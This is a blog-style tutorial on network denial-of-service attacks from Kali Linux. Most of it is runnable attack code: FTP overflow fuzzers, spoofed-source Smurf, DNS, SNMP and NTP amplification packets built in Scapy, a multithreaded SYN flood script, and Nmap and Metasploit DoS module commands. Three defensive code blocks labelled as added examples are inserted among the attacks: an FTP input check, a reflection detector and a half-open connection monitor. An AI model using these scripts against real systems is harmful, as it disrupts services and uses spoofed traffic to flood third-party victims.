Practical Techniques for Network-Based Denial of Service Attacks in Kali Linux

Denial-of-service (DoS) attacks aim to disrupt access to network resources by exhausting bandwidth, memory, processing capacity, or other critical system assets. Understanding their mechanics helps assess threats and design mitigations.

Buffer Overflow via Fuzzing

Fuzzing uncovers buffer overflow vulnerabilities by feeding malformed or random input to a program function. If the input exceeds the allocated storage, adjacent memory may be overwritten, causing crashes or undefined behavior.

A custom Python fuzzer for FTP services can automate this test. The tool connects to a target, authenticates, and appends incrementally larger payloads to a chosen command.

#!/usr/bin/python
import socket
import sys

if len(sys.argv) != 6:
    print("Usage: ./ftp_tester.py <target_ip> <port> <char_seq> <step> <limit>")
    sys.exit()

target_ip = sys.argv[1]
port = int(sys.argv[2])
char_seq = sys.argv[3]
step = int(sys.argv[4])
limit = int(sys.argv[5])

user = input("FTP user: ")
passwd = input("FTP pass: ")
cmd = input("Command to test: ")

payload_len = step
while payload_len <= limit:
    try:
        payload = cmd + " " + (char_seq * payload_len)
        print(f"Sending length {payload_len}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, port))
        s.recv(1024)
        s.send(f'USER {user}\r\n'.encode())
        s.recv(1024)
        s.send(f'PASS {passwd}\r\n'.encode())
        s.recv(1024)
        s.send(f'{payload}\r\n'.encode())
        s.send(b'QUIT\r\n')
        s.recv(1024)
        s.close()
        payload_len += step
    except Exception:
        print("Server likely crashed")
        break
else:
    print("No crash detected")

Increasing payload sizes stresses the parser. A crash indicates potential overflow.

FTP Buffer Overflow Exploitation

Certain FTP servers mishandle newline sequences in commands. Sending an excessive number of \n characters as the argument to the MKD command after authentication can corrupt the stack.

Modified fuzzer example:

#!/usr/bin/python
import socket
import sys

if len(sys.argv) != 5:
    print("Usage: ./ftp_nl_test.py <target_ip> <port> <step> <limit>")
    sys.exit()

target_ip = sys.argv[1]
port = int(sys.argv[2])
step = int(sys.argv[3])
limit = int(sys.argv[4])

user = input("FTP user: ")
passwd = input("FTP pass: ")
cmd = input("Command: ")

nl_count = step
while nl_count <= limit:
    try:
        payload = cmd + " " + ('\n' * nl_count)
        print(f"Sending {nl_count} newlines")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, port))
        s.recv(1024)
        s.send(f'USER {user}\r\n'.encode())
        s.recv(1024)
        s.send(f'PASS {passwd}\r\n'.encode())
        s.recv(1024)
        s.send(f'{payload}\r\n'.encode())
        s.send(b'QUIT\r\n')
        s.recv(1024)
        s.close()
        nl_count += step
    except Exception:
        print("Possible crash")
        break
else:
    print("No crash observed")
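The two fuzzers above probe the same server-side weakness: a control-channel reader that accepts arbitrarily long arguments or embedded newlines. The following sketch of the matching input check is an added example, not code from the original page or from any FTP server project; the 512-byte cap, the trimmed verb list, and the names parse_command and FtpReject are assumptions.

```python
MAX_LINE = 512   # assumed cap on one control-channel line, CRLF included
KNOWN_VERBS = {"USER", "PASS", "MKD", "CWD", "LIST", "QUIT"}  # trimmed for the example


class FtpReject(Exception):
    """Carries the FTP reply code to send instead of processing the line."""

    def __init__(self, code, text):
        super().__init__(f"{code} {text}")
        self.code = code


def parse_command(buf: bytes):
    """Return (verb, argument) for the first CRLF-terminated line in buf,
    None if the line is still incomplete, or raise FtpReject."""
    end = buf.find(b"\r\n")
    if end == -1:
        # No terminator yet: stop buffering once the cap is reached, so an
        # oversized argument is refused before it is copied anywhere.
        if len(buf) >= MAX_LINE:
            raise FtpReject(500, "Line too long")
        return None
    if end + 2 > MAX_LINE:
        raise FtpReject(500, "Line too long")
    line = buf[:end]
    # A bare LF, CR, NUL or other control byte inside the line is never valid;
    # this refuses the newline-stuffed MKD argument described above.
    if any(b < 0x20 or b == 0x7F for b in line):
        raise FtpReject(501, "Control character in command")
    verb, _, arg = line.decode("latin-1").partition(" ")
    verb = verb.upper()
    if verb not in KNOWN_VERBS:
        raise FtpReject(500, "Unknown command")
    return verb, arg


def reply_code_for(buf: bytes):
    """Helper for the samples: 200 if accepted, otherwise the rejection code."""
    try:
        return 200 if parse_command(buf) else None
    except FtpReject as exc:
        return exc.code


# Constructed inputs: a normal command, an oversized one, a newline-stuffed one.
SAMPLES = [b"MKD reports\r\n", b"MKD " + b"A" * 1000 + b"\r\n",
           b"MKD " + b"\n" * 100 + b"\r\n"]
```

A server that applies this check before copying the argument into any fixed-size buffer replies 500 or 501 to both fuzzers instead of crashing.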

Smurf Amplification Attack

Smurf abuses directed broadcast addresses with spoofed ICMP echo requests. Network devices reply to the forged source, multiplying traffic toward the victim.

Using Scapy:

from scapy.all import *

# Construct ICMP request with spoofed source
ip_layer = IP(src="172.16.36.135", dst="172.16.36.255")
icmp_layer = ICMP(type=8)
packet = ip_layer / icmp_layer

# Send multiple times
send(packet, count=100, verbose=1)

Modern networks often block directed broadcasts, reducing effectiveness.

DNS Amplification Attack

Open DNS resolvers return large responses to small queries. Spoofing the victim's address as the query source floods it with amplified replies.

Scapy example for ANY record lookup:

from scapy.all import *
ip = IP(dst="208.67.220.220", src="172.16.36.135")
udp = UDP(dport=53)
dns_q = DNS(rd=1, qdcount=1, qd=DNSQR(qname="google.com", qtype=255))
req = ip / udp / dns_q
send(req, count=2, verbose=1)

Response size exceeds request size, enabling traffic multiplication.

SNMP Amplification Attack

Misconfigured SNMP agents with public community strings respond to bulk requests with extensive device info. Spoofed-source queries redirect large responses toward victims.

Scapy example:

from scapy.all import *
ip = IP(dst="172.16.36.134", src="172.16.36.135")
udp = UDP(sport=161, dport=161)
snmp = SNMP(version=2, community="public", PDU=SNMPbulk(max_repetitions=50, varbindlist=[
    SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1")),
    SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.19.1.3"))]))
req = ip / udp / snmp
send(req, count=2, verbose=1)

NTP Amplification Attack

The monlist command in older NTP servers returns recent client addresses. A single request elicits a large reply, and source spoofing redirects it.

Discovery with Nmap and ntpdc:

nmap -sU 172.16.36.224 -p 123
ntpdc -n -c monlist 172.16.36.224

A lack of response implies a patched or hardened server.
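From the victim's side, DNS, SNMP and NTP reflection all look the same: UDP packets arriving from source port 53, 161 or 123 that answer no query the host ever sent. The detector below is an added example, not part of the original page; the flow-record layout, the protected network, the reply window, the byte threshold and the sample records are all assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# UDP services the page names as reflectors.
REFLECTOR_PORTS = {53: "dns", 123: "ntp", 161: "snmp"}
LOCAL_NET = ipaddress.ip_network("172.16.36.0/24")  # assumed protected network
REPLY_WINDOW_S = 5.0   # assumed: how long after a query a reply counts as solicited
ALERT_BYTES = 2000     # assumed: unsolicited bytes per (victim, service) to alert on

# Constructed flow records: (time_s, src_ip, src_port, dst_ip, dst_port, bytes)
SAMPLE_FLOWS = [
    (0.0, "172.16.36.20", 40001, "208.67.220.220", 53, 60),    # genuine query
    (0.1, "208.67.220.220", 53, "172.16.36.20", 40001, 120),   # its answer
    (1.0, "198.51.100.7", 53, "172.16.36.135", 33000, 3100),   # nobody asked
    (1.1, "198.51.100.8", 53, "172.16.36.135", 33000, 3050),   # nobody asked
    (1.2, "203.0.113.9", 123, "172.16.36.135", 123, 440),      # below threshold
    (9.0, "208.67.220.220", 53, "172.16.36.20", 40001, 120),   # outside the window
]


def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NET


def find_reflection(flows):
    """Return {(victim_ip, service): (unsolicited_bytes, distinct_sources)}
    for every victim/service pair at or above ALERT_BYTES."""
    pending = {}  # (client_ip, client_port, server_ip, server_port) -> query time
    unsolicited = defaultdict(lambda: {"bytes": 0, "sources": set()})
    for t, src, sport, dst, dport, size in sorted(flows):
        if is_local(src) and dport in REFLECTOR_PORTS:
            pending[(src, sport, dst, dport)] = t      # remember outbound query
        elif is_local(dst) and sport in REFLECTOR_PORTS:
            asked = pending.get((dst, dport, src, sport))
            if asked is not None and t - asked <= REPLY_WINDOW_S:
                continue                               # reply to a real query
            bucket = unsolicited[(dst, REFLECTOR_PORTS[sport])]
            bucket["bytes"] += size
            bucket["sources"].add(src)
    return {key: (v["bytes"], len(v["sources"]))
            for key, v in unsolicited.items() if v["bytes"] >= ALERT_BYTES}
```

Many distinct sources with no matching queries is the signature to alert on; the per-service split shows which protocol to rate-limit or filter upstream.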

SYN Flood Resource Exhaustion

A SYN flood opens many TCP half-connections by sending SYN packets without completing handshakes, overwhelming connection tables.

Multithreaded Scapy approach:

#!/usr/bin/python
from scapy.all import *
import random
import threading
import sys

def flood(tgt_ip, tgt_port):
    while True:
        src_port = random.randint(0, 65535)
        send(IP(dst=tgt_ip) / TCP(sport=src_port, dport=tgt_port, flags="S"), verbose=0)

if len(sys.argv) != 4:
    print("Usage: ./synflood.py <target_ip> <port> <threads>")
    sys.exit()

target = sys.argv[1]
port = int(sys.argv[2])
th_cnt = int(sys.argv[3])

for _ in range(th_cnt):
    threading.Thread(target=flood, args=(target, port)).start()

Unique source ports increase half-open connection count.
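On the receiving host, the half-open connections described above appear as sockets in the SYN-RECV state. The following added example (not part of the original page) parses text in the column layout of `ss -tan` and reports half-open counts per listening port; the sample output, the alert threshold and the function name are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

HALF_OPEN_LIMIT = 4  # assumed alert threshold; size it from the listener's backlog

# Constructed sample in the column layout printed by `ss -tan`.
SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN    0      128    0.0.0.0:80          0.0.0.0:*
ESTAB     0      0      172.16.36.134:22    172.16.36.1:50514
ESTAB     0      0      172.16.36.134:80    192.0.2.10:51000
SYN-RECV  0      0      172.16.36.134:80    198.51.100.23:41822
SYN-RECV  0      0      172.16.36.134:80    198.51.100.23:1093
SYN-RECV  0      0      172.16.36.134:80    198.51.100.23:60211
SYN-RECV  0      0      172.16.36.134:80    198.51.100.23:7
SYN-RECV  0      0      172.16.36.134:80    198.51.100.23:35500
SYN-RECV  0      0      172.16.36.134:22    192.0.2.44:40022
"""


def half_open_report(ss_text, limit=HALF_OPEN_LIMIT):
    """Return {local_port: {half_open, established, peers, alert}} for every
    local port that has at least one socket in SYN-RECV."""
    half_open, established = Counter(), Counter()
    peers = defaultdict(set)
    for line in ss_text.splitlines():
        fields = line.split()
        # Skip the header, LISTEN sockets and anything malformed.
        if len(fields) < 5 or fields[0] not in ("SYN-RECV", "ESTAB"):
            continue
        # rsplit keeps IPv6 literals such as [::1]:80 intact.
        port = int(fields[3].rsplit(":", 1)[1])
        if fields[0] == "SYN-RECV":
            half_open[port] += 1
            peers[port].add(fields[4].rsplit(":", 1)[0])
        else:
            established[port] += 1
    return {
        port: {
            "half_open": count,
            "established": established[port],
            "peers": len(peers[port]),   # 1 = single unspoofed source
            "alert": count >= limit,
        }
        for port, count in half_open.items()
    }
```

A high half-open count from a single peer address, as in the sample, matches a flood that varies only the source port and can be rate-limited per source; many distinct peers points to spoofing, where SYN cookies are the usual defence.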

Sockstress Attack

Sockstress maintains persistent connections with a zero receive window, forcing the server to buffer data indefinitely.

Key elements:

  • Modify iptables to block outbound RST packets.
  • Send TCP SYNs, then ACKs with window size 0.
  • Hold connections to exhaust memory.

Script-Based DoS with Nmap NSE

The Nmap Scripting Engine (NSE) includes DoS modules, e.g., smb-vuln-ms10-054. Usage:

nmap -p 445 172.16.36.134 --script=smb-vuln-ms10-054 --script-args unsafe=1

These leverage known vulnerabilities to trigger crashes or reboots.

Metasploit Auxiliary DoS Modules

Metasploit provides prebuilt DoS modules under auxiliary/dos/. Discover with:

msfconsole
search dos
use auxiliary/dos/windows/smb/ms06_063_trans
set RHOST 172.16.36.134
run

Modules automate exploit delivery for various services.

Public Exploit Databases

Repositories like Exploit-DB catalog DoS scripts. Locate candidates:

grep -i "smb.*dos" /usr/share/exploitdb/files.csv

Review, adapt, and test scripts cautiously against isolated targets.

Tags: Denial of Service DoS Attack Buffer Overflow Amplification Attack SYN Flood

Posted on Mon, 01 Jun 2026 01:33:32 +0000 by rahnel